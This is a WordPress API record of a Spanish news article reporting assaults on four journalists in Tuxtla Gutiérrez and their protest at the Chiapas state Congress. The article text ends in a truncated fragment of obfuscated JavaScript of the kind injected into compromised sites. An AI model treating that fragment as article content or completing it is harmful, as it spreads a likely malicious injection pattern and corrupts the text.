{"id":8573,"date":"2023-02-09T03:29:49","date_gmt":"2023-02-09T03:29:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8573"},"modified":"2023-02-09T03:29:50","modified_gmt":"2023-02-09T03:29:50","slug":"periodistas-exigen-alto-a-las-agresiones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8573","title":{"rendered":"Periodistas exigen alto a las agresiones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675913241030.jpg\" alt=\"\" class=\"wp-image-8574\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675913241030.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1675913241030-300x200.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.8 de febrero del 2023. Tuxtla Guti\u00e9rrez.- En los \u00faltimos siete d\u00edas, cuatro periodistas han sido v\u00edctimas de agresiones en la capital chiapaneca. Este mi\u00e9rcoles se unieron para exigir castigo a los responsables con una protesta en la entrada principal del Congreso del Estado. Luego de los diferentes hechos ocurridos, los periodistas  agredidos detallaron que han presentado las denuncias correspondientes para que no queden en la impunidad. La \u00faltima periodista agredida Ver\u00f3nica Vega Cisneros, dio a conocer que, ha presentado la denuncia correspondiente en la  Fiscal\u00eda para de Derechos Humanos, por la agresi\u00f3n sufrida por un particular cuando cubr\u00eda una nota por el fallecimiento de un menor en una guarder\u00eda. \u201cEste tipo de situaciones no deben estar pasando, en contra de quienes nos dedicamos a ejercer un trabajo reporteril, a los medios de comunicaci\u00f3n. Hace apenas una semana el compa\u00f1ero Rodolfo Flores sufri\u00f3 una agresi\u00f3n, este mi\u00e9rcoles fuimos atacadas dos compa\u00f1eras, y esto no debe de estar pasando\u201d, coment\u00f3 en entrevista. Por ello, hizo el llamado a las autoridades a no dejar impune este tipo de casos, las agresiones.  En su caso particular un sujeto, le tir\u00f3 un golpe, la amenaz\u00f3 y a pesar de haber un polic\u00eda en el lugar no hizo nada al respecto. Por estos hechos, las mujeres  periodistas hicieron un en\u00e9rgico llamado, para que no queden impune estas agresiones. A trav\u00e9s de un comunicado, expresaron que: \u201cLas mujeres que suscribimos este pronunciamiento somos periodistas que estamos conscientes de la desigualdad de g\u00e9nero con la que desempe\u00f1amos nuestro trabajo\u201d. En M\u00e9xico seg\u00fan cifras de la organizaci\u00f3n civil Articulo 19 cada 14 horas se registra una agresi\u00f3n contra una persona que ejerce el periodismo. \u201cA estos datos hay que agregarle la carga de g\u00e9nero que vivimos las mujeres que desempe\u00f1amos este oficio en un contexto sexista en donde los ataques a la prensa lo vivimos de manera diferenciada\u201d, cita el escrito. Recordaron que, este 07 de febrero dos compa\u00f1eras periodistas de Chiapas, una de ellas la compa\u00f1era Ver\u00f3nica Vega Cisneros, fueron agredidas por el mismo sujeto mientras cubr\u00edan una noticia relacionada con la muerte de un menor de edad en una instituci\u00f3n educativa particular en Tuxtla Guti\u00e9rrez.\u201cNos preocupa que las autoridades de los diferentes niveles y poderes de gobierno no procuren pol\u00edticas preventivas para evitar los ataques a la prensa\u201d, agregan. Ante esta situaci\u00f3n exigen acciones legales en contra del agresor, medidas de protecci\u00f3n para nuestras compa\u00f1eras agredidas, y pol\u00edticas con perspectiva de g\u00e9nero que garanticen nuestra libertad de expresi\u00f3n y el derecho a saber de la ciudadania.Este mismo mi\u00e9rcoles, cerca del mediod\u00eda, reporteros de diferentes medios de comunicaci\u00f3n, realizaron una protesta en la entrada de Congreso del Estado, para se\u00f1alar la falta de justicia en este tipo de casos. Lamentaron la opacidad de las autoridades, a quienes acusaron de no dar soluci\u00f3n, ni la importancia en cada agresi\u00f3n que ocurre al gremio de periodistas en la entidad. En este contexto de inseguridad, los comunicadores indicaron que, no permitir\u00e1n m\u00e1s agresiones y se mantendr\u00e1n unidos para defenderse ante cualquier situaci\u00f3n de violencia que lamentablemente van en aumento.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.8 de febrero del 2023. Tuxtla Guti\u00e9rrez.- En los \u00faltimos siete d\u00edas, cuatro periodistas han sido v\u00edctimas de agresiones en la capital chiapaneca. Este mi\u00e9rcoles se unieron para exigir castigo a los responsables con una protesta en la entrada principal del Congreso del Estado. Luego de los diferentes hechos ocurridos, los periodistas agredidos detallaron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8574,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8573","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8573"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8573\/revisions"}],"predecessor-version":[{"id":8575,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8573\/revisions\/8575"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8574"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8573"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8573"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}